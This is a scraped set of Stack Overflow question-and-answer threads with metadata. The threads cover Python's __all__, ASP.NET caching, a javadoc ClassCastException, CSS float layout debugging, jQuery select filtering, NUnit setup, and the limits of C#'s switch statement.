To better support introspection, modules should explicitly declare the names in their public API using the __all__ attribute. Setting __all__ to an empty list indicates that the module has no public API.
[...]
Imported names should always be considered an implementation detail. Other modules must not rely on indirect access to such imported names unless they are an explicitly documented part of the containing module's API, such as os.path or a package's __init__ module that exposes functionality from submodules.
Furthermore, as pointed out in other answers, __all__ is used to enable wildcard importing for packages:
The import statement uses the following convention: if a package’s __init__.py code defines a list named __all__, it is taken to be the list of module names that should be imported when from package import * is encountered.
A: __all__ affects how from foo import * works.
Code that is inside a module body (but not in the body of a function or class) may use an asterisk (*) in a from statement:
from foo import *
The * requests that all attributes of module foo (except those beginning with underscores) be bound as global variables in the importing module. When foo has an attribute __all__, the attribute's value is the list of the names that are bound by this type of from statement.
If foo is a package and its __init__.py defines a list named __all__, it is taken to be the list of submodule names that should be imported when from foo import * is encountered. If __all__ is not defined, the statement from foo import * imports whatever names are defined in the package. This includes any names defined (and submodules explicitly loaded) by __init__.py.
Note that __all__ doesn't have to be a list. As per the documentation on the import statement, if defined, __all__ must be a sequence of strings which are names defined or imported by the module. So you may as well use a tuple to save some memory and CPU cycles. Just don't forget a comma in case the module defines a single public name:
__all__ = ('some_name',)
See also Why is “import *” bad?
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44834",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1571"
} |
Q: Substitution Control at the User Control Level? I am trying to create some cached user controls. Basically Header and Footer are static.
Except the footer has one link that reads in the URL of the page and puts it into the javascript for sending a link to a friend. So I need that link to be dynamic.
I set up a substitution control and had the static method return the dynamic link.
I went to run it and found that substitution controls are not supported at the user control level.
Is there any work around to this? Is there another control like substitution that works on the User Controls that I am not aware of?
A: I would forget about server side caching in this instance and rely on the simplicity of client side caching.
Your Javascript code could be client side cached just as easily as HTML, either by linking to an external javascript file and adding the necessary headers/expiries, or by embedding the script within the page itself and ensuring the page itself is cached.
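As a sketch, the headers/expiries part can be set from ASP.NET code-behind like this (the one-day expiry is an arbitrary choice):
// In Page_Load (or the control's load): allow the browser to cache the response.
Response.Cache.SetCacheability(HttpCacheability.Public);
Response.Cache.SetExpires(DateTime.Now.AddDays(1));
Response.Cache.SetValidUntilExpires(true);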
Another possible method is by making an Ajax call on the page load to fetch the generated footer complete with correct link. This may take time on the first page load, but subsequent ajax requests would be cached on the client, thus seeing no penalty to future requests.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44851",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1"
} |
Q: Why am I getting a ClassCastException when generating javadocs? I'm using ant to generate javadocs, but get this exception over and over - why?
I'm using JDK version 1.6.0_06.
[javadoc] java.lang.ClassCastException: com.sun.tools.javadoc.ClassDocImpl cannot be cast to com.sun.javadoc.AnnotationTypeDoc
[javadoc] at com.sun.tools.javadoc.AnnotationDescImpl.annotationType(AnnotationDescImpl.java:46)
[javadoc] at com.sun.tools.doclets.formats.html.HtmlDocletWriter.getAnnotations(HtmlDocletWriter.java:1739)
[javadoc] at com.sun.tools.doclets.formats.html.HtmlDocletWriter.writeAnnotationInfo(HtmlDocletWriter.java:1713)
[javadoc] at com.sun.tools.doclets.formats.html.HtmlDocletWriter.writeAnnotationInfo(HtmlDocletWriter.java:1702)
[javadoc] at com.sun.tools.doclets.formats.html.HtmlDocletWriter.writeAnnotationInfo(HtmlDocletWriter.java:1681)
[javadoc] at com.sun.tools.doclets.formats.html.FieldWriterImpl.writeSignature(FieldWriterImpl.java:130)
[javadoc] at com.sun.tools.doclets.internal.toolkit.builders.FieldBuilder.buildSignature(FieldBuilder.java:184)
[javadoc] at sun.reflect.GeneratedMethodAccessor8.invoke(Unknown Source)
[javadoc] at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
[javadoc] at java.lang.reflect.Method.invoke(Method.java:597)
[javadoc] at com.sun.tools.doclets.internal.toolkit.builders.FieldBuilder.invokeMethod(FieldBuilder.java:114)
[javadoc] at com.sun.tools.doclets.internal.toolkit.builders.AbstractBuilder.build(AbstractBuilder.java:90)
[javadoc] at com.sun.tools.doclets.internal.toolkit.builders.AbstractMemberBuilder.build(AbstractMemberBuilder.java:56)
[javadoc] at com.sun.tools.doclets.internal.toolkit.builders.FieldBuilder.buildFieldDoc(FieldBuilder.java:158)
[javadoc] at sun.reflect.GeneratedMethodAccessor51.invoke(Unknown Source)
[javadoc] at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
[javadoc] at java.lang.reflect.Method.invoke(Method.java:597)
[javadoc] at com.sun.tools.doclets.internal.toolkit.builders.FieldBuilder.invokeMethod(FieldBuilder.java:114)
[javadoc] at com.sun.tools.doclets.internal.toolkit.builders.AbstractBuilder.build(AbstractBuilder.java:90)
[javadoc] at com.sun.tools.doclets.internal.toolkit.builders.AbstractMemberBuilder.build(AbstractMemberBuilder.java:56)
[javadoc] at com.sun.tools.doclets.internal.toolkit.builders.ClassBuilder.buildFieldDetails(ClassBuilder.java:301)
[javadoc] at sun.reflect.GeneratedMethodAccessor43.invoke(Unknown Source)
[javadoc] at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
[javadoc] at java.lang.reflect.Method.invoke(Method.java:597)
[javadoc] at com.sun.tools.doclets.internal.toolkit.builders.ClassBuilder.invokeMethod(ClassBuilder.java:101)
[javadoc] at com.sun.tools.doclets.internal.toolkit.builders.AbstractBuilder.build(AbstractBuilder.java:90)
[javadoc] at com.sun.tools.doclets.internal.toolkit.builders.ClassBuilder.buildClassDoc(ClassBuilder.java:124)
[javadoc] at sun.reflect.GeneratedMethodAccessor19.invoke(Unknown Source)
[javadoc] at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
[javadoc] at java.lang.reflect.Method.invoke(Method.java:597)
[javadoc] at com.sun.tools.doclets.internal.toolkit.builders.ClassBuilder.invokeMethod(ClassBuilder.java:101)
[javadoc] at com.sun.tools.doclets.internal.toolkit.builders.AbstractBuilder.build(AbstractBuilder.java:90)
[javadoc] at com.sun.tools.doclets.internal.toolkit.builders.ClassBuilder.build(ClassBuilder.java:108)
[javadoc] at com.sun.tools.doclets.formats.html.HtmlDoclet.generateClassFiles(HtmlDoclet.java:155)
[javadoc] at com.sun.tools.doclets.internal.toolkit.AbstractDoclet.generateClassFiles(AbstractDoclet.java:164)
[javadoc] at com.sun.tools.doclets.internal.toolkit.AbstractDoclet.startGeneration(AbstractDoclet.java:106)
[javadoc] at com.sun.tools.doclets.internal.toolkit.AbstractDoclet.start(AbstractDoclet.java:64)
[javadoc] at com.sun.tools.doclets.formats.html.HtmlDoclet.start(HtmlDoclet.java:42)
[javadoc] at com.sun.tools.doclets.standard.Standard.start(Standard.java:23)
[javadoc] at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
[javadoc] at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39)
[javadoc] at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
[javadoc] at java.lang.reflect.Method.invoke(Method.java:597)
[javadoc] at com.sun.tools.javadoc.DocletInvoker.invoke(DocletInvoker.java:215)
[javadoc] at com.sun.tools.javadoc.DocletInvoker.start(DocletInvoker.java:91)
[javadoc] at com.sun.tools.javadoc.Start.parseAndExecute(Start.java:340)
[javadoc] at com.sun.tools.javadoc.Start.begin(Start.java:128)
[javadoc] at com.sun.tools.javadoc.Main.execute(Main.java:41)
[javadoc] at com.sun.tools.javadoc.Main.main(Main.java:31)
A: It looks like this has been reported as a Java bug. It appears to be caused by using annotations from a 3rd party library (like JUnit) and not including the jar with that annotation in the javadoc invocation.
If that is the case, just use the -classpath option on javadoc and include the extra jar files.
A: I have an idea regarding this problem, though it's not an exact solution.
If you put a single comment line // before the annotation and run javadoc again, the problem goes away.
Eg: sample.java file
@ChannelPipeline
Make this change:
//@ChannelPipeline
Try to run the javadoc command once again. Now the ClassCastException won't occur.
A: There is another way to get a ClassCastException in versions of Java from 5 through 8:
java.lang.ClassCastException: com.sun.tools.javadoc.MethodDocImpl cannot be cast to com.sun.tools.javadoc.AnnotationTypeElementDocImpl
It will happen when javadoc encounters a reference to a annotation method in javadoc text before processing the same annotation for the first time used in code. Take these two classes:
/**
** {@link javax.annotation.Generated#value()}
*/
public class TestClass1 {}
@Generated("sometext")
public class TestClass2 {}
The bug is order dependent. If javadoc processes TestClass1 first, the ClassCastException will be thrown. If javadoc processes TestClass2 first, it will complete fine. The bug is reported as JDK-8170444, and was resolved as "Won't Fix". The bug is no longer present in Java 9.
As a workaround, don't link to annotation methods in your documentation text.
A: I got this problem too. I could compile properly without any errors or warnings, but when generating javadoc I got the error below.
[javadoc] java.lang.ClassCastException: com.sun.tools.javadoc.ClassDocImpl cannot be cast to com.sun.javadoc.AnnotationTypeDoc
Here is my classpath loading for my third-party-libs ...
<path id="build.classpath">
<fileset dir=".">
<include name="libs/*.jar" />
</fileset>
</path>
At my java compile target ..
<target name="compile" depends="clean, makedir">
<javac includeantruntime="false" srcdir="${src.dir}" destdir="${build.dir}" classpathref="build.classpath">
<compilerarg value="-Xlint:unchecked"/>
</javac>
</target>
And at my javadoc target...
<target name="docs" depends="compile">
<javadoc packagenames="src" sourcepath="${src.dir}" destdir="${docs.dir}"
failonerror="no"
author="true"
version="true"
windowtitle="${Name} API"
doctitle="${Name}"
bottom="Copyright © 2014 ColayHIlls.com . All Rights Reserved.">
<fileset dir="${src.dir}">
<include name="main/java/com/colayhills/jpcenter/business/service/**" />
</fileset>
</javadoc>
<echo message="java docs has been generated!"/>
</target>
So I added the classpathref="build.classpath" option to the <javadoc> tag. Now it works for me.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44853",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "55"
} |
Q: Is there any easy way to determine what factors are contributing to the size of an HTML element? For example I have a situation where I have something like this (contrived) example:
<div id="outer" style="margin: auto>
<div id="inner1" style="float: left">content</div>
<div id="inner2" style="float: left">content</div>
<div id="inner3" style="float: left">content</div>
<br style="clear: both"/>
</div>
where there are no widths set on any elements, and what I want is #inner1, #inner2 and #inner3 to appear next to each other horizontally inside #outer but what is happening is that #inner1 and #inner2 are appearing next to each other and then #inner3 is wrapping on to the next line.
In the actual page where this is happening there is a lot more going on, but I have inspected all of the elements very carefully with Firebug and do not understand why the #inner3 element is not appearing on the same line as #inner1 and #inner2 and causing #outer to get wider.
So, my question is: Is there any way to determine why the browser is sizing #outer the way it is, or why it is choosing to wrap #inner3 even though there is plenty of room to put it on the previous "line"? Barring specific solutions to this problem, what tips or techniques do you hardcore HTML/CSS/Web UI guys have for a poor back end developer who has found himself working on the front end?
A: It would be nice to have a tool that could tell you exactly what all your layout problems are, but in this case the browser rendered the page exactly how it should have -- the combined width of the floats exceeded the width of the containing block, so the last one drops to a new line (this is slightly different than the IE6 expanding box/float drop problem which is typically caused by content inside the float, not the floats themselves). So in this case, there was nothing wrong with your page.
Debugging this is simply a matter of walking through your HTML in Firebug and figuring out which children of a block is exceeding the block's width. Firebug provides plenty of information for this purpose, although sometimes I need to use a calculator. I think what you described about being able to see which elements constrain other elements would simply be too complex and overwhelming, especially for elements that are removed from normal flow (such as floats or positioned elements).
Also, a deeper understanding of how CSS layout helps a lot as well. It can get pretty complicated.
For example, it is generally recommended to assign explicit widths to floated elements -- the W3C CSS2 spec states that floats need to have an explicit width, and does not provide instructions of what to do without it. I think most modern browsers use the "shrink to fit" method, and will constrain themselves to the width of the content. However, this is not guaranteed in older browsers, and in something like a 3-column layout, you'll be at the mercy of at the width of content inside the floats.
Also, if you're striving for IE6 compatibility, there are a number of float related bugs that could also cause similar problems.
A: Try the Web Developer Plugin for Firefox. Specifically, the Information -> Display Block Size and Outline -> Outline Block Level Elements options. This will allow you to see the borders of your elements, and their size as Firefox sees them.
A: In Firebug's CSS tab, you can see what style rules apply to a selected element, in cascading order. This may or may not help with your problem.
My guess would be that something about the content of #inner3 is causing it to wrap below the first line, and the #outer is just getting sized to accommodate the smaller needed space.
A: So I found the answer in my specific case -- there was a div much further up in the DOM that had specific left/right margins set which compressed it and everything in it.
But the heart of the question is really how can you easily debug this sort of issue? What would be perfect in this case for example would be something in Firebug that, when hovering over an element's size in the layout panel would display a tool tip that says something like "width constrained by outer element X; height constrained by style Z on element Q" or "width contributed to by inner elements A, B and C".
I wish I had the time to write something like this, although I suspect it would be difficult (if not impossible) to get that information out of Firefox's rendering engine.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44864",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "4"
} |
Q: How to find the current name of the test being executed? I know I can figure out the name of the method as it's being executed; I'm just wondering if there is a way from the setup method. I guess an attribute method would work, but doing it from the setup method would be best.
EDIT NUnit
A: I know this is going to sound negative, but don't do it! :-)
The idea behind the setup method is that it executes something required by every test, which means that it doesn't matter which test is being executed, so you don't need to know the name of the method.
If you are after different data used in initialisation, then call a separate method with the data passed as a parameter from your test method.
If you really want what you are asking for, then you may need a separate method that takes the name of the current test as a parameter and is called from each test method.
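For example, a quick C# sketch of that last approach (the names here are illustrative):
using System;
using NUnit.Framework;

[TestFixture]
public class MyTests
{
    // Explicit init helper instead of relying on [SetUp]:
    // each test passes the data (here, its own name) that it needs.
    private void InitFor(string testName)
    {
        Console.WriteLine("Initializing for: " + testName);
        // ...test-specific setup here...
    }

    [Test]
    public void SomeTest()
    {
        InitFor("SomeTest");
        // ...assertions...
    }
}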
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44899",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1"
} |
Q: Is there any way to repopulate an Html Select's Options without firing the Change event (using jQuery)? I have multiple selects:
<select id="one">
<option value="1">one</option>
<option value="2">two</option>
<option value="3">three</option>
</select>
<select id="two">
<option value="1">one</option>
<option value="2">two</option>
<option value="3">three</option>
</select>
What I want is to select "one" from the first select, then have that option be removed from the second one.
Then if you select "two" from the second one, I want that one removed from the first one.
Here's the JS I have currently:
$(function () {
var $one = $("#one");
var $two = $("#two");
var selectOptions = [];
$("select").each(function (index) {
selectOptions[index] = [];
for (var i = 0; i < this.options.length; i++) {
selectOptions[index][i] = this.options[i];
}
});
$one.change(function () {
var selectedValue = $("option:selected", this).val();
for (var i = 0; i < selectOptions[1].length; i++) {
var exists = false;
for (var x = 0; x < $two[0].options.length; x++) {
if ($two[0].options[x].value == selectOptions[1][i].value)
exists = true;
}
if (!exists)
$two.append(selectOptions[1][i]);
}
$("option[value='" + selectedValue + "']", $two).remove();
});
$two.change(function () {
var selectedValue = $("option:selected", this).val();
for (var i = 0; i < selectOptions[0].length; i++) {
var exists = false;
for (var x = 0; x < $one[0].options.length; x++) {
if ($one[0].options[x].value == selectOptions[0][i].value)
exists = true;
}
if (!exists)
$one.append(selectOptions[0][i]);
}
$("option[value='" + selectedValue + "']", $one).remove();
});
});
But when the elements get repopulated, it fires the change event in the select whose options are changing. I tried just setting the disabled attribute on the option I want to remove, but that doesn't work with IE6.
A: I am not (currently) a user of jQuery, but I can tell you that you need to temporarily disconnect your event handler while you repopulate the items or, at the least, set a flag that you then test for and based on its value, handle the change.
A: Here's the final code that I ended up using. The flag (changeOnce) worked great; thanks @Jason.
$(function () {
var $one = $("#one");
var $two = $("#two");
var selectOptions = [];
$("select").each(function (index) {
selectOptions[index] = [];
for (var i = 0; i < this.options.length; i++) {
selectOptions[index][i] = this.options[i];
}
});
var changeOnce = false;
$one.change(function () {
if (changeOnce) return;
changeOnce = true;
var selectedValue = $("option:selected", this).val();
filterSelect(selectedValue, $two, 1);
changeOnce = false;
});
$two.change(function () {
if (changeOnce) return;
changeOnce = true;
var selectedValue = $("option:selected", this).val();
filterSelect(selectedValue, $one, 0);
changeOnce = false;
});
function filterSelect(selectedValue, $selectToFilter, selectIndex) {
for (var i = 0; i < selectOptions[selectIndex].length; i++) {
var exists = false;
for (var x = 0; x < $selectToFilter[0].options.length; x++) {
if ($selectToFilter[0].options[x].value == selectOptions[selectIndex][i].value)
exists = true;
}
if (!exists)
$selectToFilter.append(selectOptions[selectIndex][i]);
}
$("option[value='" + selectedValue + "']", $selectToFilter).remove();
sortSelect($selectToFilter[0]);
}
function sortSelect(selectToSort) {
var arrOptions = [];
for (var i = 0; i < selectToSort.options.length; i++) {
arrOptions[i] = [];
arrOptions[i][0] = selectToSort.options[i].value;
arrOptions[i][1] = selectToSort.options[i].text;
arrOptions[i][2] = selectToSort.options[i].selected;
}
arrOptions.sort();
for (var i = 0; i < selectToSort.options.length; i++) {
selectToSort.options[i].value = arrOptions[i][0];
selectToSort.options[i].text = arrOptions[i][1];
selectToSort.options[i].selected = arrOptions[i][2];
}
}
});
A: Or you can just hide the option you don't want to show...
function hideSelected($one, $two)
{
$one.bind('change', function()
{
var val = $one.val();
$two.find('option:not(:visible)').show().end()
.find('option[value='+val+']').hide().end();
})
}
hideSelected($one, $two);
hideSelected($two, $one);
EDIT: Oh sorry, this code does not work with IE6...
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44903",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "9"
} |
Q: C# switch statement limitations - why? When writing a switch statement, there appears to be two limitations on what you can switch on in case statements.
For example (and yes, I know, if you're doing this sort of thing it probably means your object-oriented (OO) architecture is iffy - this is just a contrived example!),
Type t = typeof(int);
switch (t) {
case typeof(int):
Console.WriteLine("int!");
break;
case typeof(string):
Console.WriteLine("string!");
break;
default:
Console.WriteLine("unknown!");
break;
}
Here the switch() statement fails with 'A value of an integral type expected' and the case statements fail with 'A constant value is expected'.
Why are these restrictions in place, and what is the underlying justification? I don't see any reason why the switch statement has to succumb to static analysis only, and why the value being switched on has to be integral (that is, primitive). What is the justification?
A: Microsoft finally heard you!
Now with C# 7 you can:
switch(shape)
{
case Circle c:
WriteLine($"circle with radius {c.Radius}");
break;
case Rectangle s when (s.Length == s.Height):
WriteLine($"{s.Length} x {s.Height} square");
break;
case Rectangle r:
WriteLine($"{r.Length} x {r.Height} rectangle");
break;
default:
WriteLine("<unknown shape>");
break;
case null:
throw new ArgumentNullException(nameof(shape));
}
A: While on the topic, according to Jeff Atwood, the switch statement is a programming atrocity. Use them sparingly.
You can often accomplish the same task using a table. For example:
var table = new Dictionary<Type, string>()
{
    { typeof(int), "it's an int!" },
    { typeof(string), "it's a string!" }
};
Type someType = typeof(int);
Console.WriteLine(table[someType]);
A:
I don't see any reason why the switch statement has to succumb to static analysis only
True, it doesn't have to, and many languages do in fact use dynamic switch statements. This means however that reordering the "case" clauses can change the behaviour of the code.
There's some interesting info behind the design decisions that went into "switch" in here: Why is the C# switch statement designed to not allow fall-through, but still require a break?
Allowing dynamic case expressions can lead to monstrosities such as this PHP code:
switch (true) {
case a == 5:
...
break;
case b == 10:
...
break;
}
which frankly should just use the if-else statement.
A: This is not a reason why, but the C# specification section 8.7.2 states the following:
The governing type of a switch statement is established by the switch expression. If the type of the switch expression is sbyte, byte, short, ushort, int, uint, long, ulong, char, string, or an enum-type, then that is the governing type of the switch statement. Otherwise, exactly one user-defined implicit conversion (§6.4) must exist from the type of the switch expression to one of the following possible governing types: sbyte, byte, short, ushort, int, uint, long, ulong, char, string. If no such implicit conversion exists, or if more than one such implicit conversion exists, a compile-time error occurs.
The C# 3.0 specification is located at:
http://download.microsoft.com/download/3/8/8/388e7205-bc10-4226-b2a8-75351c669b09/CSharp%20Language%20Specification.doc
A: Judah's answer above gave me an idea. You can "fake" the OP's switch behavior above using a Dictionary<Type, Func<object, string, string>>:
Dictionary<Type, Func<object, string, string>> typeTable = new Dictionary<Type, Func<object, string, string>>();
typeTable.Add(typeof(int), (o, s) =>
{
return string.Format("{0}: {1}", s, o.ToString());
});
This allows you to associate behavior with a type in the same style as the switch statement. I believe it has the added benefit of being keyed instead of a switch-style jump table when compiled to IL.
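Dispatching through it then looks something like this (assuming the object's runtime type has an entry in the table):
object value = 42;
Func<object, string, string> handler;
if (typeTable.TryGetValue(value.GetType(), out handler))
{
    Console.WriteLine(handler(value, "int")); // prints "int: 42"
}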
A: The first reason that comes to mind is historical:
Since most C, C++, and Java programmers are not accustomed to having such freedoms, they do not demand them.
Another, more valid, reason is that the language complexity would increase:
First of all, should the objects be compared with .Equals() or with the == operator? Both are valid in some cases. Should we introduce new syntax to do this? Should we allow the programmer to introduce their own comparison method?
In addition, allowing to switch on objects would break underlying assumptions about the switch statement. There are two rules governing the switch statement that the compiler would not be able to enforce if objects were allowed to be switched on (see the C# version 3.0 language specification, §8.7.2):
*
*That the values of switch labels are constant
*That the values of switch labels are distinct (so that only one switch block can be selected for a given switch-expression)
Consider this code example in the hypothetical case that non-constant case values were allowed:
void DoIt()
{
String foo = "bar";
Switch(foo, foo);
}
void Switch(String val1, String val2)
{
switch ("bar")
{
// The compiler will not know that val1 and val2 are not distinct
case val1:
// Is this case block selected?
break;
case val2:
// Or this one?
break;
case "bar":
// Or perhaps this one?
break;
}
}
What will the code do? What if the case statements are reordered? Indeed, one of the reasons why C# made switch fall-through illegal is that the switch statements could be arbitrarily rearranged.
These rules are in place for a reason - so that the programmer can, by looking at one case block, know for certain the precise condition under which the block is entered. When the aforementioned switch statement grows into 100 lines or more (and it will), such knowledge is invaluable.
A: It's important not to confuse the C# switch statement with the CIL switch instruction.
The CIL switch is a jump table, that requires an index into a set of jump addresses.
This is only useful if the C# switch's cases are adjacent:
case 3: blah; break;
case 4: blah; break;
case 5: blah; break;
But of little use if they aren't:
case 10: blah; break;
case 200: blah; break;
case 3000: blah; break;
(You'd need a table ~3000 entries in size, with only 3 slots used)
With non-adjacent expressions, the compiler may start to perform linear if-else-if-else checks.
With larger non- adjacent expression sets, the compiler may start with a binary tree search, and finally if-else-if-else the last few items.
With expression sets containing clumps of adjacent items, the compiler may binary tree search, and finally a CIL switch.
This is full of "mays" & "mights", and it is dependent on the compiler (may differ with Mono or Rotor).
I replicated your results on my machine using adjacent cases:
total time to execute a 10 way switch, 10000 iterations (ms): 25.1383
approximate time per 10 way switch (ms): 0.00251383
total time to execute a 50 way switch, 10000 iterations (ms): 26.593
approximate time per 50 way switch (ms): 0.0026593
total time to execute a 5000 way switch, 10000 iterations (ms): 23.7094
approximate time per 5000 way switch (ms): 0.00237094
total time to execute a 50000 way switch, 10000 iterations (ms): 20.0933
approximate time per 50000 way switch (ms): 0.00200933
Then I also did using non-adjacent case expressions:
total time to execute a 10 way switch, 10000 iterations (ms): 19.6189
approximate time per 10 way switch (ms): 0.00196189
total time to execute a 500 way switch, 10000 iterations (ms): 19.1664
approximate time per 500 way switch (ms): 0.00191664
total time to execute a 5000 way switch, 10000 iterations (ms): 19.5871
approximate time per 5000 way switch (ms): 0.00195871
A non-adjacent 50,000 case switch statement would not compile.
"An expression is too long or complex to compile near 'ConsoleApplication1.Program.Main(string[])'
What's funny here, is that the binary tree search appears a little (probably not statistically) quicker than the CIL switch instruction.
Brian, you've used the word "constant", which has a very definite meaning from a computational complexity theory perspective. While the simplistic adjacent integer example may produce CIL that is considered O(1) (constant), a sparse example is O(log n) (logarithmic), clustered examples lie somewhere in between, and small examples are O(n) (linear).
This doesn't even address the String situation, in which a static Generic.Dictionary<string,int32> may be created, and will suffer definite overhead on first use. Performance here will be dependent on the performance of Generic.Dictionary.
If you check the C# Language Specification (not the CIL spec)
you'll find "15.7.2 The switch statement" makes no mention of "constant time" or that the underlying implementation even uses the CIL switch instruction (be very careful of assuming such things).
At the end of the day, a C# switch against an integer expression on a modern system is a sub-microsecond operation, and not normally worth worrying about.
Of course these times will depend on machines and conditions. I wouldn’t pay attention to these timing tests, the microsecond durations we’re talking about are dwarfed by any “real” code being run (and you must include some “real code” otherwise the compiler will optimise the branch away), or jitter in the system. My answers are based on using IL DASM to examine the CIL created by the C# compiler. Of course, this isn’t final, as the actual instructions the CPU runs are then created by the JIT.
I have checked the final CPU instructions actually executed on my x86 machine, and can confirm a simple adjacent set switch doing something like:
jmp ds:300025F0[eax*4]
Where a binary tree search is full of:
cmp ebx, 79Eh
jg 3000352B
cmp ebx, 654h
jg 300032BB
…
cmp ebx, 0F82h
jz 30005EEE
A: This is my original post, which sparked some debate... because it is wrong:
The switch statement is not the same
thing as a big if-else statement.
Each case must be unique and evaluated
statically. The switch statement does
a constant time branch regardless of
how many cases you have. The if-else
statement evaluates each condition
until it finds one that is true.
In fact, the C# switch statement is not always a constant time branch.
In some cases the compiler will use a CIL switch statement which is indeed a constant time branch using a jump table. However, in sparse cases as pointed out by Ivan Hamilton the compiler may generate something else entirely.
This is actually quite easy to verify by writing various C# switch statements, some sparse, some dense, and looking at the resulting CIL with the ildasm.exe tool.
A: Mostly, those restrictions are in place because of the language designers. The underlying justification may be compatibility with language history, ideals, or simplification of compiler design.
The compiler may (and does) choose to:
*
*create a big if-else statement
*use a MSIL switch instruction (jump table)
*build a Generic.Dictionary<string,int32>, populate it on first use, and call
Generic.Dictionary<>::TryGetValue()
for a index to pass to a MSIL switch
instruction (jump table)
*use a
combination of if-elses & MSIL
"switch" jumps
The switch statement IS NOT a constant time branch. The compiler may find short-cuts (using hash buckets, etc), but more complicated cases will generate more complicated MSIL code with some cases branching out earlier than others.
To handle the String case, the compiler will end up (at some point) using a.Equals(b) (and possibly a.GetHashCode() ). I think it would be trival for the compiler to use any object that satisfies these constraints.
As for the need for static case expressions... some of those optimisations (hashing, caching, etc) would not be available if the case expressions weren't deterministic. But we've already seen that sometimes the compiler just picks the simplistic if-else-if-else road anyway...
Edit: lomaxx - Your understanding of the "typeof" operator is not correct. The "typeof" operator is used to obtain the System.Type object for a type (nothing to do with its supertypes or interfaces). Checking run-time compatibility of an object with a given type is the "is" operator's job. The use of "typeof" here to express an object is irrelevant.
A: By the way, VB, having the same underlying architecture, allows much more flexible Select Case statements (the above code would work in VB) and still produces efficient code where possible, so the argument from technical constraint has to be considered carefully.
A: I suppose there is no fundamental reason why the compiler couldn't automatically translate your switch statement into:
if (t == typeof(int))
{
...
}
else if (t == typeof(string))
{
...
}
...
But there isn't much gained by that.
A case statement on integral types allows the compiler to make a number of optimizations:
*
*There is no duplication (unless you duplicate case labels, which the compiler detects). In your example t could match multiple types due to inheritance. Should the first match be executed? All of them?
*The compiler can choose to implement a switch statement over an integral type by a jump table to avoid all the comparisons. If you are switching on an enumeration that has integer values 0 to 100 then it creates an array with 100 pointers in it, one for each switch statement. At runtime it simply looks up the address from the array based on the integer value being switched on. This makes for much better runtime performance than performing 100 comparisons.
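A rough C# analogy of that jump table, using an array of delegates indexed by the switched value (purely illustrative, not what the compiler actually emits):
// One slot per possible value 0..99; dispatch is a single array lookup.
Action[] jumpTable = new Action[100];
jumpTable[0] = () => Console.WriteLine("case 0");
jumpTable[1] = () => Console.WriteLine("case 1");
// ...remaining slots filled similarly (unfilled slots would be null)...

int value = 1;
jumpTable[value](); // constant-time branch, no comparisons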
A: According to the switch statement documentation, if there is an unambiguous way to implicitly convert the object to an integral type, then it will be allowed. I think you are expecting a behavior where each case statement would be replaced with if (t == typeof(int)), but that would open a whole can of worms when you get to overload that operator. The behavior would change when implementation details for the switch statement changed if you wrote your == override incorrectly. By reducing the comparisons to integral types and string and those things that can be reduced to integral types (and are intended to), they avoid potential issues.
A: I have virtually no knowledge of C#, but I suspect that either switch was simply taken as it occurs in other languages, without thinking about making it more general, or the developers decided that extending it was not worth it.
Strictly speaking you are absolutely right that there is no reason to put these restrictions on it. One might suspect that the reason is that for the allowed cases the implementation is very efficient (as suggested by Brian Ensink (44921)), but I doubt the implementation is very efficient (w.r.t. if-statements) if I use integers and some random cases (e.g. 345, -4574 and 1234203). And in any case, what is the harm in allowing it for everything (or at least more) and saying that it is only efficient for specific cases (such as (almost) consecutive numbers).
I can, however, imagine that one might want to exclude types because of reasons such as the one given by lomaxx (44918).
Edit: @Henk (44970): If Strings are maximally shared, strings with equal content will be pointers to the same memory location as well. Then, if you can make sure that the strings used in the cases are stored consecutively in memory, you can very efficiently implement the switch (i.e. with execution in the order of 2 compares, an addition and two jumps).
A: An earlier answer wrote:
"The switch statement does a constant time branch regardless of how many cases you have."
Since the language allows the string type to be used in a switch statement I presume the compiler is unable to generate code for a constant time branch implementation for this type and needs to generate an if-then style.
@mweerden - Ah I see. Thanks.
I do not have a lot of experience in C# and .NET but it seems the language designers do not allow static access to the type system except in narrow circumstances. The typeof keyword returns an object so this is accessible at run-time only.
A: I think Henk nailed it with the "no static access to the type system" thing.
Another possibility is that there is no ordering on types, whereas numerics and strings can be ordered. Thus a type switch couldn't build a binary search tree, only do a linear search.
A: I agree with this comment that using a table driven approach is often better.
In C# 1.0 this was not possible because it didn't have generics and anonymous delegates.
New versions of C# have the scaffolding to make this work. Having a notation for object literals also helps.
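As a rough sketch of what that table-driven approach can look like in newer C# (the handler bodies and names here are illustrative, not from the original comment):
using System;
using System.Collections.Generic;

class TypeDispatch
{
    static readonly Dictionary<Type, Action> Handlers = new Dictionary<Type, Action>
    {
        { typeof(int),    () => Console.WriteLine("int case") },
        { typeof(string), () => Console.WriteLine("string case") },
    };

    // Looks the handler up by the object's runtime type instead of switching.
    static void Dispatch(object obj)
    {
        Action handler;
        if (Handlers.TryGetValue(obj.GetType(), out handler))
            handler();
        else
            Console.WriteLine("default case");
    }
}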
A: C# 8 allows you to solve this problem elegantly and compactly using a switch expression:
public string GetTypeName(object obj)
{
return obj switch
{
int i => "Int32",
string s => "String",
{ } => "Unknown",
_ => throw new ArgumentNullException(nameof(obj))
};
}
As a result, you get:
Console.WriteLine(GetTypeName(obj: 1)); // Int32
Console.WriteLine(GetTypeName(obj: "string")); // String
Console.WriteLine(GetTypeName(obj: 1.2)); // Unknown
